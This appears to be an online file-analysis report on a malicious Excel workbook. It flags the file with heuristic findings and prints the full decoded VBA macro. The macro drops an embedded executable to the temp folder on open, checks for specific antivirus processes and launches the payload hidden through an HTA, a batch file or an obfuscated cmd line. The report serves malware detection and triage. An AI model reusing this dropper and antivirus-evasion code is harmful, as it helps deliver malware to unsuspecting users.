MALICIOUS
460
Risk Score
Heuristics 13
-
VBA macros detected medium 10 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm1.TextBox3.Text & UserForm3.TextBox3.Text) -
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGERVBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.Matched line in script
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm1.TextBox3.Text & UserForm3.TextBox3.Text) -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm1.TextBox3.Text & UserForm3.TextBox3.Text) -
Embedded PE decoded from VBA/UserForm payload string critical OLE_VBA_EMBEDDED_PE_DROPPERThe VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm1.TextBox3.Text & UserForm3.TextBox3.Text) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objProcesses = GetObject("w" & "in" & "mg" & "mts" & ":{impersonationLevel=impersonate}!\\" & sComputer & "\root\cimv2").ExecQuery("SELECT * FROM Win32_Process WHERE Name = '" & sExeName & "'") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
ChDir Environ("T" & "e" & "m" & "p") -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7333 bytes |
SHA-256: dbfcda0ff3be89a13e00be7fec43282ab6ab53e000314fc8c97579d0fdcb1bd4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bbbb"
Sub killo()
Call closee
Application.DisplayAlerts = False
ActiveWorkbook.SaveAs ActiveWorkbook.FullName, FileFormat:=51
Application.Quit
End Sub
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
On Error Resume Next
ChDir Environ("T" & "e" & "m" & "p")
gdffs = Environ("T" & "e" & "m" & "p") & "\"
Open gdffs & "6fsdFfa.com" For Output As #1
Print #1, HexToString("4d5a" & UserForm7.TextBox1.Text)
Close #1
Call cek
Call killo
End Sub
Public Function HexToString(ByVal HexToStr As String) As String
Dim strTemp As String
Dim strReturn As String
Dim i As Long
For i = 1 To Len(HexToStr) Step 2
strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2)))
strReturn = strReturn & strTemp
Next i
HexToString = Right(strReturn, Len(strReturn))
End Function
Attribute VB_Name = "UserForm7"
Attribute VB_Base = "0{C0A7B736-D3D1-4325-B4B8-12A99B88DA4A}{986D0647-B45D-433E-BE4E-D647DB9ECAEB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{12C65F98-D2AB-469E-BF06-C54EE42F5075}{237EA31E-AABA-47BA-9AB8-60E58816B9F2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{6A182FF8-C52F-4171-96EF-FF890D54C052}{1BD435C8-13AF-463F-9EB2-93073FE9E586}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "nnnnnn"
Sub cek()
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", 3, t)
End Sub
Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{42E1A917-E9BC-45BD-9427-BF10C1A760AA}{4D562F9E-8A30-417F-816C-26119BE5AB18}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "vvvvvvv"
Sub closee()
Dim pl, kk, gdfsfsa
kk = ".com"
pl = kk
Dim lll, jgf, tyretw
Dim laax
laax = UserForm3.TextBox2.Text
jgf = StrConv(DecodeBase64("ZXhl"), vbUnicode)
lll = "6"
Dim jddsdfda As String
jddsdfda = UserForm5.TextBox1.Text
Dim yrtfdsad, vcxvxczcv
Dim mbbmbdf
Dim nuchevi
nuchevi = UserForm5.TextBox2.Text
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm1.TextBox3.Text & UserForm3.TextBox3.Text)
Dim lhjxvcvx
lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode)
Dim kkkdds
kkkdds = StrConv(DecodeBase64("PGh" & "0bWw+DQo8" & "aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
If True = IsExeRunning(jddsdfda) Then
Open "1.hta" For Output As #1
Print #1, kkkdds
Print #1, lhjxvcvx
Close #1
Name "6fsdFfa" & kk As lll & "." & jgf
wsh.Run "1.hta", 0, False
Exit Sub
End If
If True = IsExeRunning("PS" & "UAM" & "ain" & nuchevi) Then
Name "6fsdFfa" & kk As lll & "." & jgf
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Exit Sub
End If
If True = IsExeRunning("n360" & nuchevi) Then
Name "6fsdFfa" & kk As lll & "." & jgf
Shell Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Exit Sub
End If
If True = IsExeRunning("PccNT" & nuchevi) Then
Name "6fsdFfa" & kk As lll & "." & jgf
Shell Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Exit Sub
End If
If True = IsExeRunning("uiSeAgnt" & nuchevi) Then
Name "6fsdFfa" & kk As lll & "." & jgf
Shell Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Exit Sub
End If
If True = IsExeRunning("mbam" & nuchevi) Then
Open "1s.bat" For Output As #1
Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
Close
Name "6fsdFfa" & pl As "6" & ".pif"
Shell "1s.bat", vbHide
Exit Sub
End If
If True = IsExeRunning("mbamtray" & nuchevi) Then
Open "1s.bat" For Output As #1
Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
Close
Name "6fsdFfa" & pl As "6" & ".pif"
Shell "1s.bat", vbHide
Exit Sub
End If
Name "6fsdFfa" & pl As "6" & ".pif"
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64(laax), vbUnicode)) & StrConv(DecodeBase64("X" & "DYuc" & "Glm"), vbUnicode), vbHide
End Sub
Sub fadf()
End Sub
Sub kklk()
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.DataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Public Function IsExeRunning(sExeName As String, Optional sComputer As String = ".") As Boolean
Dim objProcesses As Object
Set objProcesses = GetObject("w" & "in" & "mg" & "mts" & ":{impersonationLevel=impersonate}!\\" & sComputer & "\root\cimv2").ExecQuery("SELECT * FROM Win32_Process WHERE Name = '" & sExeName & "'")
If objProcesses.Count <> 0 Then IsExeRunning = True
End Function
|
|||
vba_embedded_payload.bin |
vba-embedded-pe | decoded from a hex/base64 payload string in a VBA UserForm control or macro literal | 82359 bytes |
SHA-256: 5f967f5e544e7b195d90f127d43d4285c07703c685cfcb74600684beaa7d4550 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.